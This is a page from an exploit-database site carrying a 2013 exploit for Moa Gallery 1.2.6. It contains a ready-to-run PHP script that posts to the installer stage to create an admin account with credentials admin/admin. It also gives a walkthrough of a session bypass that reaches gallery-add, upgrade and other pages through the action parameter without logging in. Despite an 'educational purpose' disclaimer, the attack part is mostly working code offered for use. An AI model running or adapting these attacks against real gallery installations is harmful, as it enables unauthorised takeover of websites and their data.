0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Moa Gallery 1.2.6 Multiple Vulnerabilities
[#!/usr/bin/php
# Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities
# Date : 5/17/2013
# Author: Slotleet
# Slotleet () GMAIL com
# https://fb.com/Slotleet
# Vendor Homepage: http://www.moagallery.net/
# Version affected : 1.2.6
# Tested on: WIN 7 Xd4rk EDITION
# Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P
#
# this was written for educational purpose only. use it at your own risk.
# `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Moe Gallery 1.2.6 Multiple Vulnerabilities
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [Add Admin]
<?
error_reporting(0);
if ($argc < 3){
echo "+--------------------------------------+\n";
echo "+ Usage : $argv[0] localhost /moe/ +\n";
echo "+--------------------------------------+\n";
die();
}
$site = $argv[1];
$dir = $argv[2];
$ch = curl_init("http://$site/$dir/install.php?stage=stage3a");
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
if ($result){
echo "+-------------------------------------===--+\n";
echo "+ Done ~ Username : Admin Password : Admin +\n";
echo "+--------------------------------===-------+\n";
}
?>
~ [Session Bypass]
1 // Redirect admin access for anyone not logged in
2 if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin')))
3 {
4 $action = 'login';
5 }
6
7 switch($action)
8 {
9 case "admin" :
10 {
11 include_once("sources/page_admin.php");
12 break;
13 }
14 case "admin_ftp" :
15 {
16 include_once("sources/page_admin_ftp.php");
17 break;
18 }
look to line 2 theres a function called Userisloggedin to check if the admin logged in or not, but there's `ACTION` param that calls sources folder with switch and case :).
let's see if there's a UserIsLoggedIn() in those files :).
// Only proceed if a user is logged in
if (!UserIsLoggedIn())
{
Aahhh There is ;), i check those files, and we can bypass it by browsing (index.php?action=list here)
page_gallery_add.php
page_gallery_view.php
page_image_view.php
page_image_view_full.php
page_main_view.php
page_sitemap.php
page_slideshow.php
page_upgrade.php
we can browse it via (index.php?action=gallery_add) without (Page_) :)
./EOF
# 0day.today [2024-11-16] #